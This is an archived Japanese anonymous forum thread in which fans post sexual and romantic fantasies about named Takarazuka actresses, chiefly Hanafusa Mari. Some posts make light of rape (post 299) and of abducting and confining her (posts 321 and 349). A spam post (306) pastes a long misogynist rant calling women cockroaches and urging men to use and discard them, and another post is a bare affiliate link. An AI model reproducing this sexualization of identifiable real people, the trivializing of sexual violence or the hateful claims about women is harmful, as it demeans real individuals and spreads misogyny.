273 :名無しさん@花束いっぱい。:2006/12/04(月) 02:54:08 ID:JAOwb9SV
自演も赦す良スレ。

10万円払うから、おハナを後ろからギューって抱き締めたい。

274 :名無しさん@花束いっぱい。:2006/12/06(水) 18:37:37 ID:iJd4b6MN
20万円払うからお花を正面から抱き締めてオデコをつけて囁きたい。

275 :名無しさん@花束いっぱい。:2006/12/06(水) 20:13:23 ID:CyPtah14
ウメ

276 :名無しさん@花束いっぱい。:2006/12/06(水) 23:41:35 ID:N8uHQuvi
女役の初嶺麻代は
半端な娘役よりずっと可愛い

277 :名無しさん@花束いっぱい。:2006/12/07(木) 21:47:49 ID:D9NVSijo
みなみを抱き締めてキスしたい

278 :名無しさん@花束いっぱい。:2006/12/09(土) 21:21:03 ID:ybztBehw
花の全ツでオフィーリアやった子可愛いかったなー

279 :名無しさん@花束いっぱい。:2006/12/10(日) 18:02:35 ID:VVlsla/t
花ちゃんが全ツに出たのかと思ってシモタ

280 :名無しさん@花束いっぱい。:2006/12/11(月) 20:28:29 ID:8w1Wr2do
たっちんの4姉妹と5Pしたい

281 :名無しさん@花束いっぱい。:2006/12/12(火) 14:50:22 ID:In8BCDxx
やっぱりおハナは汚れを知らん生き物だ。
ハワイのDVDが届いた。肉食タカコファンの前で恐怖で声が震えてるおハナ。
かわいいじゃないか。しばらく意気消沈していたのが突然萌えてきた!
抱きしめたいっ!

282 :名無しさん@花束いっぱい。:2006/12/12(火) 20:38:34 ID:vccYLMqD
>>280
下二人は確認してからで…ってか犯罪じゃ!

283 :名無しさん@花束いっぱい。:2006/12/12(火) 21:33:55 ID:UkEvEyMh
確認などせずとも良い。たっちんの妹だ。可愛いに決まってる。
ハァハァたっちん愛してるぅ。


284 :名無しさん@花束いっぱい。:2006/12/13(水) 10:12:59 ID:w8qlUJbJ
花ちゃんとベルバラのボレロ踊りたい!! たかこのように接近して
踊りたい!

285 :名無しさん@花束いっぱい。:2006/12/13(水) 13:51:49 ID:/wKDjCpi
おっぱい触りたいって素直に書きなよ。

286 :名無しさん@花束いっぱい。:2006/12/13(水) 14:04:55 ID:MI66XtwF
お花のオパーイは上品だから触ってもあるかなしか・・でそ?
胸パッド触っても衣装の上からじゃつまらんし
やっぱあの小さくて薄い可愛らしい唇を塞ぎたい
呼吸困難になるくらい激しいキスをあびせてやりてー
お花の華奢なアゴを持ち上げて唇奪いたいさ
きれいなうなじにも吸いつきたいな

287 :名無しさん@花束いっぱい。:2006/12/14(木) 18:57:17 ID:D8wEI254
女性セブンの中のコミックを花で…。

288 :名無しさん@花束いっぱい。:2006/12/17(日) 22:18:32 ID:uRsIg6q4
ハワイのハナが超可愛いのだが…。
髪型が思い切り私好みだ!!!!

289 :名無しさん@花束いっぱい。:2006/12/17(日) 23:57:20 ID:idhQ0a4G
たった今、ハワイのお花を見終わった。
288と同じくお花のヘアスタイルが良い。
緊張しまくりのペコペコした挨拶にお花の清らかさを感じた。
ハワイでは毎晩お花のもとにタカコは帰ってたのかと思うと複雑だが・・・
あの黒いドレスのファスナー下ろして思いっきり抱き締めたいぞ!

290 :名無しさん@花束いっぱい。:2006/12/18(月) 01:12:41 ID:ZphlQL7c
花は花でも漏れは花城舞が良い!!

291 :名無しさん@花束いっぱい。:2006/12/18(月) 06:24:23 ID:PfFftt5a
ハワイの花ちゃんは、たかこさんの会からのビデオで見たの?

292 :名無しさん@花束いっぱい。:2006/12/18(月) 10:11:30 ID:+e+XDbDu
そうだよ、ビデオじゃなくてDVDだけど。
宝塚時代よりだんぜん美しいと思った。

293 :名無しさん@花束いっぱい。:2006/12/19(火) 14:05:39 ID:9G2pgf4E
http://atq.ck.valuecommerce.com/servlet/atq/referral?sid=2219441&pid=874302784&vcptn=blog%2Fp%2FdSfxN_Fm3N_yVt5whufQMESbfDNi

294 :名無しさん@花束いっぱい。:2006/12/19(火) 14:13:53 ID:cLIdd1bX
>293
だから何?

295 :名無しさん@花束いっぱい。:2006/12/21(木) 01:57:17 ID:NkXWMT0Y
ハワイのお花ちゃんマジカワ。在団中は失敗お花バージョンもあったものだが、
ハワイは何故にあんなに可愛いのだーっ!
抱きしめて頭をかかえてイイコイイコしてやりたいっ!

296 :名無しさん@花束いっぱい。:2006/12/21(木) 10:01:19 ID:UCxZlPL/
むしろ、腕を強引に掴んで抱き締めるとか、
後ろからぎゅっと抱き締めるとかしたい@ハワイのお花
あぁーーー、お花の鎖骨噛みてぇorz

297 :名無しさん@花束いっぱい。:2006/12/22(金) 02:42:05 ID:/PTecEvG
お花に傷つけるのは許さんぞ。
そっと抱きしめてオデコにチュッ・・・な〜んて、
本音は・・・一度でいいからお花の全裸を見てみたい・・・

298 :名無しさん@花束いっぱい。:2006/12/22(金) 23:04:15 ID:QIQsZAEc
花様を妊娠させたい

299 :名無しさん@花束いっぱい。:2006/12/23(土) 01:24:46 ID:p0459UcL
妊娠なんかしたら妊娠腺はでるわ皮膚はたるむわ骨盤変わるわ、ろくなことない。
犯すのは勝手だが妊娠はイカン。

ま、手をだそうとしたところでタカコに殺されるだけだわさ。

300 :名無しさん@花束いっぱい。:2006/12/23(土) 11:54:08 ID:mDxXyJn9
>>298
>>299
まあ何てお下劣なレスなの!

301 :名無しさん@花束いっぱい。:2006/12/23(土) 20:36:18 ID:ufA2Q5Bh
はな。ただ、したいよ。

302 :名無しさん@花束いっぱい。:2006/12/23(土) 20:43:00 ID:ufA2Q5Bh
ただ、抱きたい。貴女を。
決してふしだらではナイ!

303 :名無しさん@花束いっぱい。:2006/12/24(日) 15:46:13 ID:1vePbP1T
貴女に抱かれたい。月組と花組公演まで待てないよ〜

304 :名無しさん@花束いっぱい。:2006/12/24(日) 16:29:55 ID:78SOXSsp
ももさりネェサンにキスされたい

305 :名無しさん@花束いっぱい。:2006/12/24(日) 21:10:45 ID:vhrTpf6o
末子さんに寝込みを襲われたい。
成り行きで成就してしまうかも。

306 :名無しさん@花束いっぱい。:2006/12/24(日) 21:22:01 ID:G+4N0cwQ
His judgement cometh and that right soon

男性諸君、結婚すると不幸になる。女の外面は綺麗で清潔で良い人、内面はずるくて汚いため、口も悪くなる
今の女は「どうやって男にたかるか」を必死に考えてる。騙されるな。家事は極めて軽労働になった
コンビニやPC、風俗関係も、「嫁いらず」に拍車をかける。今の女は「人生の不良債権」「北朝鮮」「金メッキを施したゴキブリ」
社会的に男女は対等で平等。男が女を養ったり守る必要はない「見切れ!見切り千両!私不幸なの?嘘!泣いてます?演技!情けは不要!つけこまれるぞ」
女は社会的優遇、過剰な法的保護、仕事と家庭の二束のわらじを得て、もはや女尊男卑〜結婚しようとするあなたを彼女は陰で小馬鹿にしている事でしょう〜

★☆★よほどの事が無い限り結婚は保留し、沢山の女性と自由に恋愛(sex)を楽しめ♪★☆★ 避妊(ピル等)は忘れずにねd(^−^
★☆★捨てた女は優しい真面目男が結婚(残飯処理)してくれるさw★☆★

それでも結婚する君へ究極の護身法→[夫婦財産契約登記]
夫婦財産契約により契約財産制となり、自分の稼いだ財産はすべて自分の物
離婚時に財産の半分を配偶者に取られない

・弱い者いじめは最低と言いつつ、赤ちゃんを殺す母親(そして無罪判決(笑
・狙撃は女子のほうが強い。男は、ノイローゼになってやめてしまうが
女は何人殺してもノイローゼにならない。そして、骨盤が安定しているため

・ナチスの拷問で、女の拷問の残虐非道さを見て、拷問をしていた男達もひいたという
拷問しながら楽しそうに笑みをうかべていたそうだ。罪悪感や引け目が無い

・有史以前が女尊男卑の時代だったことを指摘したのは、スイスの学者バッハオーフィン
アマゾン女族の女王は、法律を定め、女には従軍させ、男たちには卑しい奴隷の仕事を課した
男児が生まれたら、脚と腕を不自由にして、戦えなくした
・王位継承権が女性にだけあったという事実だけから考えて、古代エジプトでは女性権力が非常に大きかった
男女平等どころか、かなり女性上位の社会であった
・日本国でも卑弥呼が女王
・昆虫などにいたっては、オスカマキリはメスに食われてしまう

女は虐げられてきた?父系社会など人類の歴史から見ればほんのわずかな期間に過ぎない。むしろ・・・

307 :名無しさん@花束いっぱい。:2006/12/24(日) 23:41:23 ID:vhrTpf6o
↑なんだこりゃ
かなり支離滅裂な奴だな。
とりあえず女に相手にされず、結婚したくても出来ない奴だろうな、ということは分かった。

308 :名無しさん@花束いっぱい。:2006/12/25(月) 09:19:37 ID:3r5gQwcJ
可愛くてスタイルのよい
となみちゃんにキスされたい。ナルシストな彩音ちゃんは神秘的な魅力があると思うな。

309 :名無しさん@花束いっぱい。:2006/12/26(火) 23:42:18 ID:l5l3Crmd
ここはキスされたいスレじゃなく、したいスレだよ。

タカコ、退団してだいぶたつのに王子スタイルで内面も在団中より男らしかったって話きいて、
花が男に目覚める事がないだろうと思うと少し嬉しかったりする。
タカコはシャクだが、花が浮き世離れの純潔である限り、
夢の中で花にキスして花を抱けるし…

310 :名無しさん@花束いっぱい。:2006/12/27(水) 14:53:09 ID:ZN4ciiko
わかったから…みんな上げちゃだめよ…

>308
黒蜥蜴な彩音タソに誘惑されたいーっ!!

311 :名無しさん@花束いっぱい。:2006/12/27(水) 20:07:11 ID:LJ9k89o/
だからさー、「されたい」スレじゃなくて「したい」スレなんだよ。

312 :名無しさん@花束いっぱい。:2006/12/27(水) 23:25:47 ID:GzD8NFIK
キスしあいたいは宜しいでつか

313 :名無しさん@花束いっぱい。:2006/12/27(水) 23:57:36 ID:LJ9k89o/
特別にOK

314 :名無しさん@花束いっぱい。:2006/12/28(木) 18:54:29 ID:Tcgt3c+j
ハナチャンのうなじにキスマークつけたい

315 :名無しさん@花束いっぱい。:2006/12/28(木) 20:05:26 ID:zvDsh5yE
却下!


と、言いたいところだが、キスマークを付けた後で
わざと首まわりの見える服を着せて連れまわしてみたいかも。

316 :名無しさん@花束いっぱい。:2006/12/28(木) 23:06:12 ID:anLFDjYX
花ちゃんの足首掴んで、足の裏ぺろぺろしたい。
「いやーん、くすぐったい〜」と言ってのけぞらせたい


317 :名無しさん@花束いっぱい。:2006/12/29(金) 01:39:39 ID:33AJMrJ1
ぽっぽさん

318 :名無しさん@花束いっぱい。:2006/12/30(土) 11:55:01 ID:gbPUYLkj
人妻ですか

319 :名無しさん@花束いっぱい。:2006/12/30(土) 14:30:03 ID:2R1qhaek
花様もいわば人妻。

320 :名無しさん@花束いっぱい。:2006/12/30(土) 14:47:47 ID:gbPUYLkj
わぁお!

321 :名無しさん@花束いっぱい。:2006/12/31(日) 09:22:36 ID:EFdKBKbz
花様を拉致・監禁したい。
貴子のところになんか、絶対帰さない!

322 :名無しさん@花束いっぱい。:2006/12/31(日) 11:16:18 ID:mESi3z/h
拉致監禁はやめとけw
でもうしろからパクっとくらいついてみたいね
ハナフサの小さく薄い唇に吸いついて呼吸も舌も奪いつくし
ハナフサの吐息は全てのみこんでしまいたい。

323 :名無しさん@花束いっぱい。:2006/12/31(日) 17:21:05 ID:QxixSGTP
せめて初夢の中くらい、みんなの煩悩が叶いますように!

324 :名無しさん@花束いっぱい。:2006/12/31(日) 18:47:13 ID:fVi2wG9u
そして明日、半年ぶりの動くマリー様を拝めるわけだ。
どうしよう急にエロくなってたら。
楽しみだなあ同士たち!!!!!

325 :名無しさん@花束いっぱい。:2006/12/31(日) 21:41:33 ID:OxPsF1yc
エロくなってたら、やだ!
純白さんがチョイエロになるのはワクワクするけど
タカが調教したエロサかと思うと鬱。

326 :名無しさん@花束いっぱい。:2006/12/31(日) 23:55:27 ID:BjcrtL05
花總が和装なら着物で姫はじめ

327 :名無しさん@花束いっぱい。:2007/01/01(月) 17:13:29 ID:XBjS4iyE
BSハナちゃん、めちゃくちゃ可愛かった!!
二の腕がちょっと太くなってたような気がするのは私だけ?


328 :名無しさん@花束いっぱい。:2007/01/01(月) 17:48:22 ID:haNbjtvg
太ったと言うと意味とり違えられそうだけど、ふっくらして筋張った腕じゃなくなったね。
顔もツルツル卵型になって、可愛らしいったらない。
ちょっとタカコを尻に敷いてる感じもしたが、キヨラカさは失ってない。

329 :名無しさん@花束いっぱい。:2007/01/01(月) 21:48:25 ID:EDKFkvzU
帰省中だから見てないんだけど、花さま指輪してたって本当っすか?
なんか脱力感‥or2

330 :名無しさん@花束いっぱい。:2007/01/01(月) 22:03:06 ID:rBWwxRUF
左手中指だけどね>指輪
それにしても相当可愛いかった。
エロくはなかったかなw

331 :名無しさん@花束いっぱい。:2007/01/01(月) 22:23:04 ID:3Qn2jw1y
>>329何でやねん
指輪ごときで

332 :名無しさん@花束いっぱい。:2007/01/01(月) 22:29:00 ID:EDKFkvzU
すまんです。
普通はどうって事ないけど、あの人余りアクセしない人だし。

333 :名無しさん@花束いっぱい。:2007/01/01(月) 22:34:12 ID:3Qn2jw1y
きっと貴子からのプレゼンツさ

334 :名無しさん@花束いっぱい。:2007/01/01(月) 23:45:30 ID:mBHYCZYh
クリスマスプレゼントじゃない?

335 :名無しさん@花束いっぱい。:2007/01/02(火) 11:22:52 ID:b1ft46nu
膝枕してもらって、ゆる髪を指でいじって遊びたい!!
クルクルしてみて〜!!

タカコの姿が想像出来るのが裏山orz

336 :名無しさん@花束いっぱい。:2007/01/02(火) 11:33:21 ID:x8ZAPk1V
>322
昔は長い間ずっとおんなじ指輪してたじゃん。
あれも旦那とのおそろとか言われてたがw。

337 :336:2007/01/02(火) 11:37:26 ID:x8ZAPk1V
安価間違えた。332宛てだったorz

338 :!omikuji!dama:2007/01/02(火) 12:20:55 ID:RqJT5QYI
事後にハアハア息があがってる所で「○○さん、サイコォ…」と言わせる。

339 :名無しさん@花束いっぱい。:2007/01/02(火) 14:23:01 ID:vQyAMkP2
>>335
あの髪型はよかったな!
ウワサで聞いてたワイハバージョンをさらに上品にした感じで、
まさに深窓の令嬢。キヨラカ炸裂。
おしゃべりマリタンのクチビルをふさいでやりてえぇぇぇ

340 :名無しさん@花束いっぱい。:2007/01/02(火) 14:25:07 ID:vQyAMkP2
>>335
あの髪型はよかったな!
ウワサで聞いてたワイハバージョンをさらに上品にした感じで、
まさに深窓の令嬢。キヨラカ炸裂。
おしゃべりマリタンのクチビルをふさいでやりてえぇぇぇ

341 :名無しさん@花束いっぱい。:2007/01/02(火) 20:16:57 ID:PvCJ51JZ
あんな可愛いお花を独占するなんて、タカコをゆるせないよ。
あのビジュアルでソプラノボイスで声だされた日にゃ…
お花の可愛さに興奮しながらも、なんか脱力もする。
手に入らないのはわかってるけどさ。

342 :名無しさん@花束いっぱい。:2007/01/03(水) 09:26:14 ID:9TCl1IUb
阪急か阪神の福袋に「ハナフサマリとの同居権一億円」
てのがあったら、生涯ローン組んででも、
生命保険入ってでも買う。

343 :名無しさん@花束いっぱい。:2007/01/03(水) 12:51:26 ID:IkiiUCDS
ハナフサヲタってホント気持ち悪い
女だったらさらにキモイ

344 :名無しさん@花束いっぱい。:2007/01/03(水) 14:14:02 ID:vNmuFhJO
343は自分で自ら人生の半分に相当する楽しみを捨ててそうだな。
男も女も大いに色を楽しまなくては!

345 :名無しさん@花束いっぱい。:2007/01/03(水) 18:21:08 ID:G3SPGLeZ
ていうか、キモイと思うようなスレを自らわざわざ覗きにくる神経がわからん。
よほどのアフォかマゾなのか・・・
スレタイみたらどういう中身かわかりそうなものだろうが。

346 :名無しさん@花束いっぱい。:2007/01/04(木) 14:15:50 ID:RVspI/nX
お花。可愛い。マジ。イイコイイコしてみたい。
イイコイイコするだけでいいから。

347 :名無しさん@花束いっぱい。:2007/01/04(木) 15:37:37 ID:yKT6P77C
↑危ねえ〜。
「お菓子買ったげるから付いといで」って言って連れ去る誘拐犯みたいだ。

348 :名無しさん@花束いっぱい。:2007/01/04(木) 17:44:08 ID:+EG4N/i2
タカコサンがお待ちですのでご案内します・・・って言ったら、
やすやすと車に乗っちゃいそ。

349 :名無しさん@花束いっぱい。:2007/01/06(土) 20:28:21 ID:Z5lqmWaz
で、拉致監禁コース。マリタンのためならお縄になってでも。

350 :名無しさん@花束いっぱい。:2007/01/07(日) 14:36:42 ID:UdEhV9Fx
拉致監禁で思い出したが
「傭兵ピエール」での投獄監禁シーンは興奮した。
「私はもう生娘ではないんです!」部分だけ何度も何度も見た。
ソプラノボイスがエロさを増長させ、妄想をかきたてた。
あんなプレイをタカコとやってんのかなあ。
くぅぅぅ裏山!っつうかマリタンを独り占めすんのやめろ!!!

351 :名無しさん@花束いっぱい。:2007/01/07(日) 18:01:31 ID:RDd7Lu56
ある意味では本当に生娘おハナ。

352 :名無しさん@花束いっぱい。:2007/01/08(月) 20:48:34 ID:gaeImKJ3
拉致監禁なんて勇ましいこと言っても、
結局は寝顔見るだけで一晩明かしてしまいそうだ。

353 :名無しさん@花束いっぱい。:2007/01/08(月) 22:12:33 ID:AEMRaH21
マネージャー反対

354 :名無しさん@花束いっぱい。:2007/01/08(月) 22:25:58 ID:syHIA4NL
スレチだ、ヴォケ

355 :名無しさん@花束いっぱい。:2007/01/09(火) 03:38:19 ID:dKTpS3Lv
おハナたん、少しふっくらしたよね。
抱き甲斐がありそう。ちょぴっとくらいオパーイ育ったかな。

356 :名無しさん@花束いっぱい。:2007/01/09(火) 20:55:57 ID:mpeugw+r
やっぱベルバラのフィナーレのタカコとのボレロの花ちゃんの顔がたまらい
ほどゾクゾクしたよ。 他の娘役とは違うんだよね。
でもキスとかするなら花ちゃんではなく、音乃いづみちゃんのがいいなー。

花ちゃんは後ろから抱き着いてみたいけど。

357 :名無しさん@花束いっぱい。:2007/01/09(火) 23:54:46 ID:NJbb9w9O
マネージャー賛成

358 :名無しさん@花束いっぱい。:2007/01/10(水) 00:54:56 ID:96Hek/Ia
スレチだってばよ、ヴォケ

359 :名無しさん@花束いっぱい。:2007/01/10(水) 14:55:31 ID:r3Ym+t08
このスレR指定だね。

360 :名無しさん@花束いっぱい。:2007/01/10(水) 15:43:21 ID:pBVDbQ5S
なんせ1の名前が「煩悩」だからね。
ってゆうかageんなよ。

72 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)